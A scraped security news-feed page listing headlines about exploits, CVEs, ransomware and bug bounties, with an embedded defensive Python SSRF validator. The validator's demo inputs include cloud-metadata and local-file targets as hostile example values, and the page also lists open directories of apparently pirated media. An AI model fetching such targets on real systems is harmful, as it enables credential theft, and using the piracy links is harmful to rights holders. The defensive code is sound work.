    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide to how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSQL injection; as you know this is my first time with NoSQL injection, so I was learning a lot from TryHackMe.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022 Ransomware and Malware Report by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Movies and TV-shows (Good speed)
    submitted by /u/lnsideMyHead [link] [comments]
    Anime and some Music
    submitted by /u/mingaminga [link] [comments]
    Index of /Johnny Cash CDs/
    submitted by /u/mingaminga [link] [comments]
    A lot of software, Games, Film and series in various language
    http://103.222.20.150/ftpdata/
    Url: http://103.222.20.150/ftpdata/
    Top 5 extensions (files, size): .mp4 12,912, 11.59 TiB; .mkv 9,042, 9.3 TiB; .avi 2,965, 1.38 TiB; .rar 21, 36.18 GiB; [no extension shown] 16, 19.15 GiB
    Dirs: 16,920; Ext: 59; Total: 46,363 files, 22.4 TiB; Date (UTC): 2022-02-08 23:34:44; Time: 01:48:31; Speed: 0.00 MB/s (0.0 mbit)
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    CVE-2022–22718: Windows Print Spooler Privilege Escalation
    Article URL: https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81?gif=true Comments URL: https://news.ycombinator.com/item?id=30273774 Points: 3 # Comments: 1  ( 11 min )
    CVE-2022-21703: cross-origin request forgery against Grafana
    Article URL: https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/ Comments URL: https://news.ycombinator.com/item?id=30270751 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Simply GeoEstimation — OSINT Challenge 13
    On Dec 20, 2021, OSINT Dojo shared an OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 10
    In this article I will explain how to solve Hacktoria’s Geolocation 10 challenge. However, I must give a quick disclaimer first. I already… Continue reading on Medium »  ( 5 min )
  • Open

    Can deleted WhatsApp conversations from an iPhone be recovered without backup?
    I deleted a very important conversation on WhatsApp 2 days ago. The iPhone 12 (running iOS 15.x) in question has been powered off and hasn't been used since. I understand that WhatsApp saves a backup copy in Android phones' local memory every day at 2am and erases them every 7 days, however I can't find anything about iOS devices. To make matters worse, I deleted the conversation around 7pm, so before the local backup could trigger at 2am. Is there any chance to get this conversation back without any backup? And what would my chances be with a Cellebrite device? submitted by /u/Strangedreamest [link] [comments]  ( 2 min )
  • Open

    Information security technology: Guidelines for security management of the mobile internet application (App) lifecycle (draft for comment) released
    The draft has six chapters: scope, normative references, terms and definitions, abbreviations, overview, and lifecycle management; it gives guidance on security requirements, security recommendations, security management and more.
    FreeBuf Morning Report | “Roaming Mantis” is targeting Europe; Vodafone Portugal hit by a large-scale cyberattack
    Vodafone Portugal suffered a cyberattack that caused severe disruption to the country's communications and television services.  ( 1 min )
    SlowMist: detailed analysis of how US law enforcement cracked the 2016 Bitfinex hack case
    One open question: who was the hacker that actually attacked Bitfinex and stole the coins?  ( 1 min )
    NetWalker ransomware member sentenced to 80 months in prison
    Recently, Canadian man Sebastian Vachon-Desjardins was sentenced to six years and eight months in prison for taking part in NetWalker ransomware attacks.
    On SSRF and various bypass techniques
    SSRF vulnerabilities arise mainly when a server-side endpoint takes a URL parameter naming the content it should fetch and does not filter the URL parameter sent by the client.  ( 1 min )
    Puma hit by data breach after ransomware attack; Microsoft fixes 48 security vulnerabilities | Global cybersecurity highlights, Feb 9
    Sportswear maker Puma suffered a data breach after a December 2021 ransomware attack on Kronos, one of its North American workforce-management service providers.
    Survey of the state of global industrial cybersecurity
    [Editor's note] Industrial organizations faced major challenges in 2021. The cyberattacks on the Oldsmar, Florida water facility, Colonial Pipeline and JBS, as well as the Solar  ( 1 min )
    “Roaming Mantis” malware extends its reach into Europe
    Criminals can use stolen photos to make money in other ways, such as extortion or sexual harassment.  ( 1 min )
    Israeli surveillance company QuaDream exposed
    “According to five people familiar with the matter, a flaw in Apple software that Israeli surveillance company NSO Group used in 2021 to break into iPhones was also abused by a competing company.” According to the Reuters article, “the company, named QuaDream, is a smaller, lower-profile Israeli firm that also develops smartphone hacking tools for government customers.” QuaDream was founded by former Israeli military officer Ilan Dabelstein and two former NSO employees, Guy Geva and  ( 1 min )
    Microsoft disables the ms-appinstaller protocol to stop malware distribution
    Microsoft announced it has temporarily disabled the MSIX App Installer's ms-appinstaller protocol on Windows 10/11 to prevent abuse by malware.
    Update promptly: Microsoft's February patches fix 48 important vulnerabilities, including one zero-day
    On February 8, 2022, Microsoft released a batch of patches fixing 48 vulnerabilities, including one zero-day.  ( 1 min )
    “14th Five-Year Plan for Financial Standardization” released, strengthening financial cybersecurity standards
    The plan calls for strengthening protection through financial cybersecurity standards, improving the standards system for cybersecurity and data security in the financial industry, and building a standards system for protecting the financial industry's critical information infrastructure to support stronger security capabilities.
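The SSRF item above gives the root cause: a server-side endpoint fetches whatever URL the client supplies, without filtering it. The following is an added example (not code from the FreeBuf article) of the check a fetcher should run before connecting: allow only http/https, resolve the host, and refuse any answer inside loopback, private, link-local or IPv4-mapped ranges. It is written to run offline: `example_resolver` and its lookup table are constructed stand-ins for DNS, and the blocked-range list is a hypothetical policy to adapt per deployment.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical deny-list for this example: ranges a server-side fetcher should never be steered to.
_BLOCKED_NETWORKS = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("100.64.0.0/10"),     # carrier-grade NAT
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),    # link-local, includes cloud metadata 169.254.169.254
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),          # IPv6 unique local
    ipaddress.ip_network("fe80::/10"),         # IPv6 link-local
    ipaddress.ip_network("::ffff:0:0/96"),     # IPv4-mapped IPv6 (also unwrapped below)
]

# Constructed lookup table so the example runs without DNS; a deployment uses _resolve_default.
_EXAMPLE_TABLE = {
    "example.com": ["93.184.216.34"],
    "rebind.example": ["203.0.113.5", "10.0.0.7"],   # mixed answer: one public, one internal
}


def example_resolver(host: str) -> list:
    return _EXAMPLE_TABLE.get(host, [])


def _resolve_default(host: str) -> list:
    # Every address the name maps to; getaddrinfo also normalises odd literals such as 127.1
    # or a decimal address, which is why the check is on resolved addresses, not on the string.
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_blocked_ip(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return any(ip in net for net in _BLOCKED_NETWORKS)


def validate_fetch_target(url: str, resolver=_resolve_default) -> tuple:
    """Return (resolved_ip, host) for a URL the server may fetch, or raise ValueError.

    The caller should open the connection to resolved_ip and set the Host header
    itself; resolving a second time at connect would let a DNS rebinding answer
    swap in an internal address after this check passed.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.username or parsed.password:
        raise ValueError("credentials in URL not allowed")
    host = parsed.hostname
    if not host:
        raise ValueError("missing host")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP: no DNS needed
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        raise ValueError(f"no address for {host}")
    for addr in addrs:                              # one internal answer rejects the whole name
        if is_blocked_ip(addr):
            raise ValueError(f"{host} resolves to blocked address {addr}")
    return addrs[0], host


def is_allowed_url(url: str, resolver=_resolve_default) -> bool:
    try:
        validate_fetch_target(url, resolver)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for u in ["http://example.com/", "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:127.0.0.1]/", "http://rebind.example/", "file:///etc/passwd"]:
        print(f"{u:45} allowed={is_allowed_url(u, example_resolver)}")
```

A deny-list like this blocks the common bypasses the article's title alludes to (IPv4-mapped IPv6, mixed DNS answers, odd literal encodings) only because it checks the address the resolver returns rather than the URL string; where the set of legitimate destinations is known, an allow-list of hostnames is stricter and simpler than any deny-list.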
  • Open

    PrivateLoader: the first step in many malware schemes
    Translator: Knownsec 404 Lab translation team. Original link: https://intel471.com/blog/privateloader-malware For a long time, pay-per-install (PPI) malware services have been an integral part of the cybercrime ecosystem. Malware operators provide payment, the malicious payload and targeting information, and the people running the service outsource distribution and propagation. Their accessibility and reasonable cost let malware operators wield these services as a weapon for fast, bulk...
    Rebuilding the world: a look back at The Sandbox arbitrary-burn vulnerability
    Author: Victory@SlowMist Security Team. Original link: https://mp.weixin.qq.com/s/UECwAt_p8rXn-3kZ4kC2VQ According to SlowMist intelligence, on January 28, 2022 The Sandbox officially announced a migration of its LAND smart contract, but the announcement did not say what exactly was wrong with the contract. The SlowMist security team shares its brief analysis below. Project background The Sandbox is a virtual wor...


    Hypothetical incident: what would be an appropriate response?
    Hello AskNetSec! I am curious what you all would consider an appropriate response to an incident such as a user reporting that they've clicked on a phishing link. Personally, I believe it is appropriate to probe about what popped up after clicking the link, whether or not they entered any of their information, and whether or not they notice any abnormal behavior on their computer after clicking on the link. After that, have the user change their password as a precaution and move on and begin monitoring. I figure between the questions assuring they did nothing more than click, a password change, existing security controls such as CrowdStrike, and monitoring for abnormal behavior, there isn't much more that makes sense to do. Others on my team seem to think it's worth downloading Microsoft Safety Scanner and running a full system scan, which I argue doesn't hurt, but also probably doesn't add much value unless something is seen on the user's computer that would prompt further investigation. Especially since I can't imagine Microsoft Safety Scanner is going to pick up on something that CrowdStrike does not. Understandably, different companies may expect different responses based on established policy and regulations. But I want to leave it kind of open ended and see what other IT and security professionals believe is appropriate for these types of incidents? How deep do you go for these types of things? submitted by /u/unseenspecter [link] [comments]
    IR Retainer things to consider
    When looking to purchase Incident Response Retainers what are things you wish you knew prior to purchasing? Are there any gotchas that should be considered? What can I learn from you in your experience with this? submitted by /u/gnomeparadox [link] [comments]
    What level of knowledge should Tier 1 SOC analysts have to enter the job?
    Each of the sub-branches of cyber security is like a different world for itself, there is no end when you want to learn. For example, we agree that it is necessary to have knowledge about malware analysis for the position of security analyst. However, if you try to improve yourself in malware analysis, you can probably only work on malware analysis for years. At this point, many people do not know how much technical knowledge is required to get started. For this reason, many people cannot be accepted to the job due to an insufficient level in job applications, or the starting process may take longer as people spend too much time on training and develop technical knowledge beyond the level required to start the job. In your opinion, what should be the technical level required to start working in the security analyst position? submitted by /u/umuttosun [link] [comments]
    Infosec as "just" a job?
    Hi, I'm a CS student who's been learning a mishmash of basics to get into infosec — some assembly, wifi cracking, sql injection, etc under my belt, just the very basics, but I'm kind of overwhelmed by how... Enthusiastic and into it everyone seems to be. I'm not sure I'm "built" for it either, since I can't relate to the culture about stuff like lockpicking and causing trouble in school networks and stuff. Never done any social engineering in my life. I'm more of a science guy, and I went into CS because I'm aiming for a practical job that's in STEM. That's it, really. I'm willing to learn things in my spare time but I can't dredge up the same intense curiosity I see in people I've seen both IRL and online in security. Will I drown? Should I look elsewhere? submitted by /u/Wild_Rutabaga_3099 [link] [comments]
    Malware playbooks
    I was wondering what your malware playbooks look like. We got a bunch of malware alerts today for items that were deleted by the av. It caused some internal discussions on common practices. submitted by /u/xX_s0up_Xx [link] [comments]
    How to become a pen tester?
    submitted by /u/AlmightyMemeLord404 [link] [comments]
    Any insights on purchasing Palo Alto firewalls for home/lab use?
    I see a wide range of pricing for the PA-200 through 400 models and am not sure why. Anybody else running a small PAN device in their homelab have insight on purchasing a refurb and maybe one or two subscriptions set up on it? Is it best to look for an authorized dealer or is eBay safe? submitted by /u/EnterNam0 [link] [comments]

    Kubernetes for pentesters
    There are countless articles on hacking kubernetes clusters but is there any research or repos on how you can use k8s for pen testing? One idea is using a cluster in which each node is a “person” that has access to a specific machine or to a different machine. I’m open to other ideas regarding the usage of k8s to improve hacking automation submitted by /u/sirlordjax [link] [comments]
    Invisible Sandbox Evasion - Check Point Research
    submitted by /u/dmchell [link] [comments]
    Helping users stay safe: Blocking internet macros by default in Office
    submitted by /u/dmchell [link] [comments]

    Some OS ISO (Fast Download)
    Some Linux and Windows (Some in Pt/de/ru/en) ISO, The server has a pretty decent speed. Url: https://root3.minerswin.de/ISO/
    Top 5 extensions (files, size): .iso 102 (195,47 GiB); .zip 50 (60,06 GiB); .xz 18 (14,95 GiB); .ova 4 (11,6 GiB); .7z 2 (3,7 GiB)
    Dirs: 71; Ext: 12; Total: 323 files, 288,59 GiB. Date (UTC): 2022-02-08 23:22:22; Time: 00:00:03; Speed: 46,65 MB/s (373,2 mbit). Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Random Stuff in French
    Url: http://5.196.72.204/
    Top 5 extensions (files, size): .mkv 141 (459,53 GiB); .avi 99 (70,71 GiB); .mp4 533 (51,46 GiB); .tar 1 (28 GiB); .m2ts 33 (27,8 GiB)
    Dirs: 532; Ext: 58; Total: 4 362 files, 683,72 GiB. Date (UTC): 2022-02-08 23:08:45; Time: 00:00:07; Speed: 11,11 MB/s (88,9 mbit). Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    French Film & Series
    Url: http://www.zoppello.fr/download/
    Top 5 extensions (files, size): .mkv 937 (668,57 GiB); .avi 66 (68,38 GiB); .mp4 61 (22,63 GiB); .ts 5 (17 GiB); .flv 17 (7,07 GiB)
    Dirs: 187; Ext: 15; Total: 1 405 files, 790,34 GiB. Date (UTC): 2022-02-08 23:07:02; Time: 00:00:04; Speed: 11,05 MB/s (88,4 mbit). Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    South Park
    Hey everyone looking for South Park season downloads thanks in advance submitted by /u/Los-Aragon [link] [comments]

    SharpSQL: C# MS SQL enum and exploitation
    submitted by /u/IamaCerealKilla [link] [comments]
    SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
    submitted by /u/ly4k_ [link] [comments]
    How Docker Made Me More Capable and the Host Less Secure
    submitted by /u/jat0369 [link] [comments]
    AWS Cloud Security Challenges
    submitted by /u/0xdeadbeef0000 [link] [comments]
    PPE - Poisoned Pipeline Execution. Running malicious code in your CI, without access to your CI
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    How open-source packages handle releasing security fixes
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]

    VSCode Remote Development Extension Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21991 Comments URL: https://news.ycombinator.com/item?id=30262516 Points: 8 # Comments: 0

    100 Days of Hacking — DAY 4
    Objectives of day 4 : Continue reading on Medium »
    SQL Injection, Reflected XSS and Information Disclosure in one subdomain in just 10 minutes
    Hi there, 7odamo is here. First of all this is my first write-up and I am still a beginner, so I might write something wrong, then it’s… Continue reading on Medium »
    100 DAYS OF HACKING — DAY 3
    woohoo, sup fellow hackers. it’s day 3 / 100 we have a long way to go. Continue reading on Medium »
    Securing Lichess one move at a time
    Hi there, thanks for stopping by and taking some time to read my blog post about how I helped secure my favorite chess playing which if… Continue reading on Medium »
    Privilege Escalation Using Wildcard Injection | Tar Wildcard Injection |
    This blog is about how to use Wildcard Injection to escalate privileges to root in Unix-like OS. Continue reading on System Weakness »
    Full Account takeover (ATO) — a tale of two bugs
    Hi everyone, I hope we’re all having a swell day. Before I jump into today's bug report, I’d like to express my sincerest gratitude for… Continue reading on Medium »
    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »
    APWine Incorrect Check of Delegations Bugfix Review
    In the Web2 world, a simple oversight in the code doesn’t always result in a huge breach of data (of course, sometimes they do). In Web3… Continue reading on Immunefi »
    2FA Bypass Techniques
    Hello lads, it’s me again. Let’s discuss different techniques about bypassing 2FA. Continue reading on Medium »
    You Can Takeover Any GOOGLE Account !
    Thank you for taking the time to read about “ You Can Takeover Any GOOGLE Account ! ” Continue reading on Medium »

    What is OSINT(Part 2): Dangers of Oversharing
    This article was written in collaboration with Aardwarewolf Continue reading on Medium »
    What is OSINT? (Part 2)
    The dangers of oversharing Continue reading on Medium »

    Something's Amiss . . .
    Hello everyone...super noob alert: I'm taking a digital forensics class and rather than using the virtual lab decided to do some memory analysis on my machine. Since I know little about computers and even less about what I'm looking at, maybe I'm being paranoid, but maybe you can shed some light? As I don't know the email addresses, nor do email addresses like "stealerbyframe@mail.ru", "360saftfirehackr@qq.com", or my favorite "pizda@qq.com"--inspire confidence, those addresses raised some alarms. I used FTK Imager to do a memory dump on my system. I then used Bulk Extractor to organize the data a bit and the screen shot is some emails I found in the email.txt file result. Why, for example, are they in my computer's memory!? https://preview.redd.it/9orfvtravmg81.png?width=1326&format=png&auto=webp&s=65d81163bcd0e35d26a7cc2c88a5025762e36d9a https://preview.redd.it/80togtravmg81.png?width=509&format=png&auto=webp&s=3d14c00dbe7395beb8e682bd2fe0cc50e7d66277 submitted by /u/Funny-Appearance9167 [link] [comments]
    Beginner-level mini-course on starting a new investigation with Autopsy. Covers data organization, documentation, new case creation, ingest modules, basic analysis workflow, and exporting reports.
    submitted by /u/DFIRScience [link] [comments]

    SecWiki News 2022-02-08 Review
    No news updates today. For more of the latest articles, visit SecWiki

    Beaconfuzz - A Journey into #Ethereum 2.0 Blockchain Fuzzing and Vulnerability Discovery
    submitted by /u/pat_ventuzelo [link] [comments]
    Top 6 Books to learn the Rust Programming Language in 2022
    submitted by /u/pat_ventuzelo [link] [comments]

    Object Overloading
    Using an OS binary to carry out our bidding has been a tactic employed by Red Teamers for years. This eventually led to us coining the term LOLBIN. This tactic is typically used as a way of flying under the radar of EDR solutions or to bypass application whitelisting by surrounding our code in the... The post Object Overloading appeared first on TrustedSec.

    Cross-site Scripting (XSS) - Stored | forum.acronis.com
    Acronis disclosed a bug submitted by quadrant: https://hackerone.com/reports/1161241 - Bounty: $50
    Stored Cross-site Scripting on devicelock.com/forum/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1122513 - Bounty: $50
    Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com
    Acronis disclosed a bug submitted by ashmek: https://hackerone.com/reports/1018790
    Attacker Can Access to any Ticket Support on https://www.devicelock.com/support/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1124974 - Bounty: $250
    Information Disclosure via ZIP file on AWS Bucket [http://acronis.1.s3.amazonaws.com]
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1121771

    2021 Global Industrial Cybersecurity Situation Report
    Drawing on 50 weekly security situation bulletins from 2021, 六方云 (Liufangyun) analyzes the global state of industrial security in detail, assesses the industrial security situation from multiple angles, and provides a practical reference for those responsible for industrial security.
    Research on detecting and exploiting command execution when there is no output
    During penetration tests, vulnerability hunting and security research we often encounter command execution points that return no output.
    FreeBuf Morning Report | Meta threatens to pull out of Europe; there are no free "red envelopes" online
    Meta has threatened that it will consider withdrawing from Europe if the EU does not allow the company's US operations, applications and data centers to share EU user data.
    Incident response case analysis of a phishing email at Site X
    There are many articles on incident response, but few on how to put the SANS and NIST framework models into practice. This is a simple model-based analysis of the current Site X phishing email case from a personal point of view.
    Morley, which serves Fortune 100 companies, hit by ransomware attack, large amount of user information leaked
    The leaked data types include: names, addresses, Social Security numbers, dates of birth, customer identification numbers, medical diagnosis and treatment information, and health insurance information.
    Shanghai releases its first Enterprise Data Compliance Guidelines
    The Guidelines comprise six chapters and thirty-eight articles, mainly setting out rules for enterprises' data compliance management structures and for identifying and handling risk.

    CVE-2021-4160: OpenSSL carry propagation bug in some TLS 1.3 default curves
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-4160 Comments URL: https://news.ycombinator.com/item?id=30256773 Points: 2 # Comments: 0

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!

    Roaming Mantis malware reaches Europe
    Translator: Knownsec 404 Lab translation team. Original: https://securelist.com/roaming-mantis-reaches-europe/105596/ Roaming Mantis (漫游螳螂) is a malicious campaign that targets Android devices and spreads mobile malware through phishing SMS messages. We have been tracking Roaming Mantis since 2018 and have published five blog posts on this activity: Roaming Mantis uses DNS hijacking to infect...
    SoK: an analysis of browser security
    Translator: Knownsec 404 Lab translation team. Original authors: Jungwon Lim, Yonghwi Jin†, Mansour Alharthi, Xiaokuan Zhang, Jinho Jung, Rajat Gupta, Kuilin Li, Daehee Jang‡, Taesoo Kim. Abstract: Web browsers are an indispensable part of everyone's daily life. They are routinely used for security-critical and privacy-sensitive tasks such as banking transactions and checking...

    How to Get Rid of the Most Common Types of SEO Spam
    What is SEO Spam? SEO spam is what attackers will inject into a website to attempt to use your SEO ranking for something else not ranked otherwise that will further the attackers’ objective. They spam and destroy the website while trying to generate revenue or achieve some other goal. Due to this, generally, the website owner is completely unaware of what’s going on unless they receive warnings or are added to blocklists. Usually, a hacker will try to avoid being detected by rearranging links that aren’t visible to the average site visitor and only crawlers/index engines can see it. Continue reading How to Get Rid of the Most Common Types of SEO Spam at Sucuri Blog.

    Lots of music
    Mostly 320kbit mp3. Complete collections. Great KISS folder. http://nordserv.no/english/ submitted by /u/inoculatemedia [link] [comments]
    More music some flac
    https://www.aidd.org/conspiracy/03/sounds/mp3s/ submitted by /u/inoculatemedia [link] [comments]
    Rap and R&B
    http://bawkawajwanw.com/Music/ submitted by /u/inoculatemedia [link] [comments]
    QSL.NET 's Old Radio Client Programming Software CPS RSS (Including GR1225 RSS 4.0)
    submitted by /u/Goldmann_Sachs [link] [comments]

    February Newsletter
    The following is a monthly conglomeration of articles, sites and techniques that we have found both interesting, and beneficial, to our… Continue reading on Medium »
    Why Is Iceland So Small- OSINT Challenge 12
    On Jan 17, 2022, OSINT Dojo shared a new OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction: Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-privileged users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.

    Tailscale CVE: TS-2022-001
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-001 Comments URL: https://news.ycombinator.com/item?id=30248447 Points: 2 # Comments: 0
    CVE-2021-39137 – a Golang security bug that Rust would have prevented
    Article URL: https://research.nccgroup.com/2022/02/07/a-deeper-dive-into-cve-2021-39137-a-golang-security-bug-that-rust-would-have-prevented/ Comments URL: https://news.ycombinator.com/item?id=30244773 Points: 4 # Comments: 0

    How we could have listened to anyone’s call recordings.
    About Us: Detect, Prioritize and Negate Cloud Security Threats that matter! https://pingsafe.com Continue reading on Medium »
    Rce via Image (jpg,png) File Upload..!
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »
    Subdomain Takeover
    What is subdomain? Continue reading on Medium »
    How to Install BFAC on Kali Linux
    BFAC (Backup File Artifacts Checker): Tool to check backup artifacts that may disclose the web-application’s source code | Sensitive… Continue reading on Medium »
    The story of Scamster Tony Capo: Aggressive Cyber Warfare Specialist
    This scamster aka https://tonycapo.net/ or whatever his real name is, has been scamming people since 2019, There are multiple bad reviews… Continue reading on Medium »
    How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!
    We at DefCore Security intend to provide great visibility to clients while working on the pentest engagement. We give our clients the… Continue reading on Medium »
    Error: Please run “shodan init ” before using this command
    Hello All, if you ever tried running shodan in Kali Linux and got shodan init error. Then keep reading….! Continue reading on Medium »
    Is my organization ready for a bug bounty program?
    Bug Bounty programs can be a great thing for both the organization, as well as for the hacker. The question is, can every organization… Continue reading on Medium »
    RCE in .tgz file upload
    Cre: Machevalia’s Blog Continue reading on Medium »
    CEH Practical Exam Guide
    Exam Information Continue reading on Medium »

    How to Make Package Signing Useful
    submitted by /u/dlorenc [link] [comments]
    SHA-256 explained step-by-step visually
    submitted by /u/jandrusk [link] [comments]
    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]
    A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
    submitted by /u/digicat [link] [comments]
    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    UEFI firmware vulnerabilities affect at least 25 computer vendors
    submitted by /u/TryptamineEntity [link] [comments]
    Linux Persistence using Systemd Generators. They will run early at boot and can be used to create services and disable other services before they start.
    submitted by /u/dashboard_monkey [link] [comments]
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]

    Application level DOS at Login Page ( Accepts Long Password )
    Reddit disclosed a bug submitted by e100_speaks: https://hackerone.com/reports/1168804
    Leaking sensitive information through JSON file path.
    Nextcloud disclosed a bug submitted by rohitburke: https://hackerone.com/reports/1211061

    SecWiki News 2022-02-07 Review
    ML-DOCTOR: a holistic study of inference attacks on machine learning models, by ourren; Identifying and tracing black- and gray-market operations, by ourren; Grand Theft Auto -- playing with rolling codes (Part 2), by ourren. For more of the latest articles, visit SecWiki

    Email platform Zimbra issues hotfix for XSS vulnerability under active
    Article URL: https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation Comments URL: https://news.ycombinator.com/item?id=30246174 Points: 1 # Comments: 0

    KillDefenderBOF: Beacon Object File PoC implementation of KillDefender
    submitted by /u/5ub34x_ [link] [comments]

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials

    FreeBuf Morning Report | DHS to focus on the log4j vulnerability; education sector hardest hit by cyberattacks in 2021
    The software's widespread use and ease of exploitation make this an extremely serious vulnerability; DHS's best practice is to concentrate on reviewing the log4j library and the vulnerabilities encountered during the related remediation process.
    PayBito cryptocurrency exchange hit by cyberattack, large amount of data stolen
    The LockBit ransomware gang claims to have stolen a large amount of customer data from the PayBito cryptocurrency exchange.
    Multiple flights delayed! Swiss airport services company Swissport hit by ransomware attack
    Swissport International Ltd. was hit by a ransomware attack, delaying multiple flights.
    Winter Camp | New challenges from advanced threats on mobile endpoints and how to detect and counter them
    According to public statistics, by mid-2021 the number of mobile internet users had reached 1.007 billion.
    Winter Camp | New developments in threat frameworks
    This article introduces and analyzes the 2021 progress in research on and application of the ATT&CK threat framework from three angles: new content, new directions and new forces.
    Winter Camp | Solutions for building commercial cryptography applications
    With the deepening of digitalization, networking and intelligent systems, and the transformation driven by big data, cloud computing, blockchain, AI and other technologies, new business models keep emerging across industries.
    Microsoft blocked tens of billions of brute-force and phishing attacks last year
    From January 2021 to December 2021, Microsoft blocked more than 25.6 billion Azure AD brute-force authentication attacks and intercepted 35.7 billion phishing emails.

    I'm feeling like I'm underpaid at $60k CAD in Montreal Canada
    Hi everyone, I'm currently working as an information security analyst for this non-tech company here in Montreal Canada for 9 months already. I have 7 years of total work experience (5 years customer service, 2 years as an IT tech + SysAdmin). I have the Azure Security Engineer Associate AZ-500 certification. I'm currently paid 60k CAD. Since I'm the only security analyst in my organization, I'm the only one leading multiple security projects. My company has multiple divisions across Canada, South America and Asia with around 1000 employees. My first project after landing the job was the deployment of Bitlocker on every laptop and modern desktop in the company. One of the big projects I'm currently running alone is the architecting and deployment of MFA across all employees and all our divisions + deployment of a new VPN solution for employees, with Multi Factor Authentication on every VPN connection. My biggest duties outside of projects are threat detection and response, training and security awareness to employees, and patching old and vulnerable systems. I think I was lucky to find a security role with no prior security experience, but I feel like I'm underpaid. And my annual evaluation is coming in a month. Should I look around for jobs that could pay me better? Should I meet with my manager and ask for a raise? Thank you Edit: added "architecting MFA" submitted by /u/hey_its_meeee [link] [comments]
    Do penetration testers ever get called in at 3AM?
    submitted by /u/notburneddown [link] [comments]

    Learning V8 exploitation from scratch: CVE-2021-30517 (Part 7)
    Author: Hcamael@Knownsec 404 Lab. Related reading: Learning V8 exploitation from scratch: setting up the environment (Part 1); Learning V8 exploitation from scratch: the generic V8 exploit chain (Part 2); Learning V8 exploitation from scratch: starctf 2019 OOB (Part 3); Learning V8 exploitation from scratch: CVE-2020-6507 (Part 4); Learning V8 exploitation from scratch: CVE-2021-30632 (Part 5); Learning V8 exploitation from scratch...

    Paragraph Separator (U+2029) XSS
